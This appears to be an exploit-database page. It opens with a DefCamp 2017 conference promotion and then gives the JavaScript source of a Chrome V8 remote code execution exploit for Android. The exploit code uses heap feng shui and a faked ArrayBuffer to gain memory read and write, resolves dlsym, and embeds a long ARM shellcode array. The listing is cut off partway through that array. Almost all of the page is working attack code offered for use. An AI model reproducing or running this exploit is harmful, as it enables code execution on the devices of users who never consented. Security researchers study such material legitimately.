Leaderboard

DefCamp 2017

See you in November at DefCamp 2017 Want to experience a conference that offers outstanding content infused with a truly cyber security experience? For two days (November 9th-10th) Bucharest will become once again the capital of information security in Central & Eastern Europe hosting at DefCamp more than 1,300 experts, passionate and companies interested to learn the “what” and “how” in terms of keeping information & infrastructures safe. Now it’s getting really close: this year's conference is only months away, and that means very early bird tickets are now available. Register Now at DefCamp 2017 (50% Off) What can you expect from the 2017 edition? 2 days full of cyber (in)security topics, GDPR, cyber warfare, ransomware, malware, social engineering, offensive & defensive security measurements 3 stages hosting over 35 international speakers and almost 50 hours of presentations Hacking Village hosting more than 10 competitions where you can test your skills or see how your technology stands 1,300 attendees with a background in cyber security, information technology, development, management or students eager to learn How to get involved? Speaker: Call for Papers & Speakers is available here. Volunteer: Be part of DefCamp #8 team and see behind the scene the challenges an event like this can have. Partner: Are you searching opportunities for your company? Become our partner! Hacking Village: Do you have a great idea for a hacking or for a cyber security contest? Consider applying at the Hacking Village Call for Contests. Attendee: Register at DefCamp 2017 right now and you will benefit of very early bird discounts. Register Now at DefCamp 2017 (50% Off) Use the following code to get an extra 10% discount of the Very Early Bird Tickets by June 27th. This is the best price you will get for 2017 edition. Code: DEFCAMP_2017_VEB_10 Website: https://def.camp/

January 10, 2018

4 points

Google Chrome - V8 Private Property Arbitrary Code Execution (Android)

<html> // Source: https://github.com/secmob/pwnfest2016/ <script> function exploit(){ function to_hex(num){ return (num>>>0).toString(16); } function intarray_to_double(int_arr){ var uBuf = new Uint32Array(2); var dBuf = new Float64Array(uBuf.buffer); uBuf[0]=int_arr[0]; uBuf[1]=int_arr[1]; return dBuf[0]; } function str_to_double(str){//leng of str must be 8 var dBuf = new Float64Array(1); var u8Buf = new Uint8Array(dBuf.buffer); for(var i=0;i<str.length;i++){ u8Buf[i] = str.charCodeAt(i); } return dBuf[0]; } function double_to_array(value){ var uBuf = new Uint32Array(2); var dBuf = new Float64Array(uBuf.buffer); dBuf[0]=value; return uBuf; } function gc(){ for(var i=0;i<0x100000/16;i++){ new String; } } function getHiddenValue(){ var obj = {}; var oob = "/re/"; //oob = oob.replace("re","*".repeat(0x2000)); oob = oob.replace("re","*".repeat(0x100000)); var str = 'class x extends Array{'+oob+"}"; var fun = eval(str); Object.assign(obj,fun); return obj; } var obWin; function makeOobString(){ var hiddenValue = getHiddenValue(); var magicStr = "bbbb"; var arr=[]; var str = 'class x extends Array{}'; for(var i=0;i<str.length;i++){ arr[i]=str.charCodeAt(i); } var ob = new Array(0x200); ob.fill(0x31313131); gc(); gc(); str=String.fromCharCode.apply(null,arr); ob=ob.concat(0x32323232); var fun = eval(str); ob[2]=str; ob[3]=ob; Object.assign(fun,hiddenValue); var oobString = fun.toString(); gc(); gc(); print("begin search"); var subStr = oobString.substr(0,0x8000); var pos = subStr.indexOf(magicStr); print("end search"); if(pos==-1){ print("find magic failed"); postMessage(false); self.close(); print("unpossible"); throw "error"; }else{ print("find magic at "+pos); } oobString = oobString.substr(pos,ob.length*4); obWin=ob; return oobString; } var oobString = makeOobString(); print("get oob string successfully"); function print(){ console.log.apply(null,arguments); /*document.write('<p >'); document.write.apply(document,arguments); document.write("<p>");*/ } function str2arr(str,len){//len must be multile of 4 if(len===undefined) len = str.length; var u8a = new Uint8Array(len); for(var i=0;i<len;i++){ u8a[i] = str.charCodeAt(i); } return new Uint32Array(u8a.buffer); } function pArrayInHex(arr){ var result="<p style='font-size:8px'>"; for(var i=0;i<arr.length;i++){ result+=(arr[i]+0x100000000).toString(16).substr(-8); result+=" "; if(i%8==7) result+="<p style='font-size:8px'>"; } result+="<p>"; print(result); //alert(result); return result; } function pStrInHex(str){ //var result="<p style='font-size:8px'>"; var result="\n"; for(var i=0;i<str.length;i++){ var code = str.charCodeAt(i); result+=(code+0x100).toString(16).substr(-2); if(i%4==3) result+=" "; if(i%32==31) // result+="<p style='font-size:8px'>"; result+="\n"; } // result+="<p>"; result+="\n"; print(result); return result; } function getObjAddr(obj){ obWin[0]=obj; var value2= ((str2arr(oobString,4))[0]); return value2>>>0; } var getObj24BitsAddr = function(){ var smi=0; var code = 0; var i=0; //don't allocate heap object function getAddr(obj){ obWin[0]=obj; value=0; code = 0; i=0; for(i=2;i>=0;i--){ code = oobString.charCodeAt(i); value = code+value*256; } return value; } return getAddr; }(); var lengthInOldSpace = 0xfffffffc; var abarr=new Array(800); function sprayVM(){ var i=0; var j=0; try{ for(i=0;i<20;i++){ var u8 = new Uint8Array(0x10000000-0x500); abarr[i]=u8; } }catch(e){} try{ for(j=0;j<100;j++){ var u8 = new Uint8Array(0x8000000-0x500); abarr[i+j]=u8; } }catch(e){} print("allocate "+i+" 256M "+j+" 16M ") function getRandomInt(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } delete abarr[getRandomInt(0,i)]; } function getNewSpaceAddrs(){ /*var kMaxRegularHeapObjectSize =523776;// 507136; var str="1".repeat(kMaxRegularHeapObjectSize-0x2000); str+="%";*/ var objsInNewSpace = new Array(80); for(var i=0;i<objsInNewSpace.length;i++){ //var xx=escape(str); var xx = new Array(0x70000/4); objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0; //使newspace更离散 new Uint8Array(0x100000-0x500); new Uint8Array(0x100000-0x500); } function compareNumbers(a, b) { return a - b; } objsInNewSpace = Array.from(new Set(objsInNewSpace)); objsInNewSpace = objsInNewSpace.sort(compareNumbers); return objsInNewSpace; } print("begin get new space address"); var objsInNewSpace = getNewSpaceAddrs(); while(objsInNewSpace.length<16){ objsInNewSpace = getNewSpaceAddrs(); print("new space addresses"); pArrayInHex(objsInNewSpace); } try{ sprayVM(); }catch(e){} var selectedTrunk = 0; var selectedStr = ""; function bruteForceFengShui(){ var huge_str = "x".repeat(0x100000-0x9000);//-0x9000 huge_str +="%"; var hold = new Array(100); //var holdaddress = new Array(100); for(var i=0;;i++){ var large = escape(huge_str); var addr = getObjAddr(large); //console.log(addr.toString(16) + " "+i); if(i<hold.length){ hold[i]=large; //holdaddress[i]=addr; } addr=(addr&0xfff00000)>>>0; addr = addr-0x100000; if(objsInNewSpace.indexOf(addr)!=-1){ selectedTrunk = addr; selectedStr = large; abarr.fill(1); hold.fill(1); //holdaddress.fill(1); break; } if(i===150){ /*i=0; print("tried 200 times"); abarr.fill(1); try{ sprayVM(); }catch(e){};*/ postMessage(false); close(); throw "exceed limits"; } } } bruteForceFengShui(); //to avoid allocate memory latter, initilize here var nextTrunk = selectedTrunk + 0x100000; //生成一块足够大的可读写内存 var huge_str = "eval('');"; //8000不能太大，太大会使new_space增大 for(var i=0;i<8000;i++) huge_str += 'a.a;'; huge_str += "return 10;"; var huge_func = new Function('a',huge_str); huge_func({}); function fillNewSpace(origObj){ //first object in new space at 0x8100, new spaces layout //0x40000 //0x37f00 //..... //0x40000 var gap = "g".repeat(0x37f00-12-3);//12 is head of string,3 %25 var gap = gap+"%"; //flat gap gap.substr(0,100); var fillstr = "%20a".repeat((0x40000-12)/4); fillstr = escape(fillstr); var addr=0; for(var i=0;i<0x100;i++){ addr = getObj24BitsAddr(origObj); if((addr&0xfffff)===0x8101) origObj=escape(gap); else origObj=unescape(fillstr); } } function findNewSpace(){ var kMaxRegularHeapObjectSize =523776;// 507136; var str="1".repeat(kMaxRegularHeapObjectSize-0x2000); str+="%"; for(var i=0;;i++){ var xx=escape(str); var straddr = getObjAddr(xx); addr=(straddr&0xfff00000)>>>0; if(addr===selectedTrunk){ print("good state "+straddr.toString(16)); break; } } } function myencode(str){ var arr = []; for(var i=0;i<str.length;i++){ if(i%2==1) arr.push(str.charCodeAt(i)); else{ arr.push(37);//% var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2); arr.push(hexstr.charCodeAt(0)); arr.push(hexstr.charCodeAt(1)); } } return String.fromCharCode.apply(null,arr); } var dArray = []; var index = (0x8100-36)*2; for(var i=0;i<0x20000/8;i++){ dArray[i]=str_to_double("%03x%03x"); } var occulen = 0; var i = 0; var savedChunk = new Uint8Array(0x8100); var hiddenValue = getHiddenValue(); var arr=[]; fillNewSpace(new String); findNewSpace(); var classStr = 'class x extends Array{}'; for(var i=0;i<classStr.length;i++){ arr[i]=classStr.charCodeAt(i); } var magicStr = String.fromCharCode(0x86,0x24); classStr=String.fromCharCode.apply(null,arr); var ab = new ArrayBuffer(0x1243); var fun = eval(classStr); Object.assign(fun,hiddenValue); var oobStr = fun.toString(); /*(gdb) x/20xw 0x5600c45c array buffer layout * 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020 * 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000 */ //overwrite huge string as array buffer var abLengthIndex = oobStr.indexOf(magicStr); var strArrayBuffer = oobStr.substr(abLengthIndex-12,32); //replace the byteLength var LengthAddr = getObjAddr(lengthInOldSpace); var strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24); var strBase = "\x00\x00\x00\x00"; strArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12); strArrayBuffer = myencode(strArrayBuffer); for(var i=0;i<strArrayBuffer.length/8;i++){ var d = strArrayBuffer.substr(i*8,8); dArray[index/8+i] = str_to_double(d); } var classStrAddr = getObjAddr(classStr)>>>0; //set read position var readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head //length control the length of unscaped string, generated string has 12 bytes head //left 0x1000*2 bytes to avoid gc var subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000); //save the the chunk head to be corrupted var nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12; var savedThunkStr = oobStr.substr(nextThunkOffset,0x8100); for(var i =0;i<savedThunkStr.length;i++){ savedChunk[i] = savedThunkStr.charCodeAt(i); } var pos1=new String; var pos1addr = getObj24BitsAddr(pos1)-1; //0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray occulen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff); //minus the length of double array if(occulen<0x40000+16+8) throw "no enough room"; occulen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray if(occulen%4!==0) throw "length don't align"; var arrocc=new Array((occulen/4)); //set unescape write position var occDoubleArray = dArray.concat(); var b=unescape(subOobStr); //restore the corrupted chunk head var u8 = new Uint8Array(selectedStr,nextTrunk,0x8100); for(var i=0;i<savedChunk.length;i++){ u8[i] = savedChunk[i]; } print("long string allocated at "+classStrAddr.toString(16)); if(typeof(selectedStr)==="string"){ print("overwrite failed"); postMessage(false); close(); return; //throw "overwrite failed"; } var fakeab = selectedStr; print("faked array buffer byte length is "+fakeab.byteLength.toString(16)); var globaldv = new Uint32Array(fakeab); function read_uint32(from_address){ var u32 = globaldv[(from_address/4)>>>0]; return u32>>>0; } function read_uint8(from_address){ from_address = from_address>>>0; var index = (from_address/4)>>>0; var mask = from_address%4; var u32 = globaldv[index]; u32 = u32<<8*(3-mask); return u32>>>24; } function read_uint32_unalign(from_address){ var u32 = 0; for(var i=3;i>=0;i--){ var u8 = read_uint8(from_address+i); u32 = u32*0x100+u8; } return u32>>>0; } //rw to execute //get function point of v8::internal::Accessors::ReconfigureToDataProperty function getFixedFunctionPoint(fakeab){ var FunctionAddress = getObjAddr(Function); var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000); var map = u32[0]; u32 = new Uint32Array(fakeab,map-1,0x1000); //instance descriptors var descriptors = u32[7]; u32 = new Uint32Array(fakeab,descriptors-1,0x1000); var lengthAccessorInfo = u32[6]; u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000); var setterForeign = u32[4]; u32 = new Uint32Array(fakeab,setterForeign-1,0x1000); var functionPoint = u32[1]; return functionPoint-1; } var funPoint = getFixedFunctionPoint(fakeab); print("ReconfigureToDataProperty at"+funPoint.toString(16)); var pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval var point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000 print("chrome.apk base at "+point.toString(16)); function find(startAddr,len,pattern){ for(var i=0; i<(len-pattern.length); i++ ) { for(var j=0;j<pattern.length;j++){ var temp = read_uint8(startAddr+i+j); //print(temp.toString(16)); if(temp!=pattern[j]) break; } if(j==pattern.length) return startAddr+i; } print("find failed"); } var pattern_position=find(point,0x10000000,pattern); print("find pattern at "+to_hex(pattern_position)); function get_dest_from_blx(addr) { var val = read_uint32_unalign(addr); var s = (val & 0x400) >> 10; var i1 = 1 - (((val & 0x20000000) >> 29) ^ s); var i2 = 1 - (((val & 0x8000000) >> 27) ^ s); var i10h = val & 0x3ff; var i10l = (val & 0x7fe0000) >> 17; var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2); return ((addr + 4) & ~3) + off; } function backup_original_code(start_address){ var backup_arr = []; set_access_address(start_address); var u8arr=new Uint8Array(faked_ab); for(var i=0;i<shellcode.length+4096;i++){ backup_arr[i]=u8arr[i]; } return backup_arr; } function restore_original_code(start_address,backup_arr){ set_access_address(start_address); var u8arr=new Uint8Array(faked_ab); for(var i=0;i<shellcode.length+4096;i++){ u8arr[i]=backup_arr[i]; } } huge_func({}); print("blx instruction content is "+to_hex(read_uint32_unalign(pattern_position-4))); var dlsym_addr = get_dest_from_blx(pattern_position-4); print("dlsym address is "+to_hex(dlsym_addr)); var huge_func_address = getObjAddr(huge_func)-1; print("huge func address is "+to_hex(huge_func_address)); for(var i=0;i<20;i++){ print(to_hex(read_uint32(huge_func_address+i*4))); } var huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4 print("huge func code entry is "+to_hex(huge_func_code_entry)); print(to_hex(read_uint32(huge_func_code_entry))); //var so_str= ""; var shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x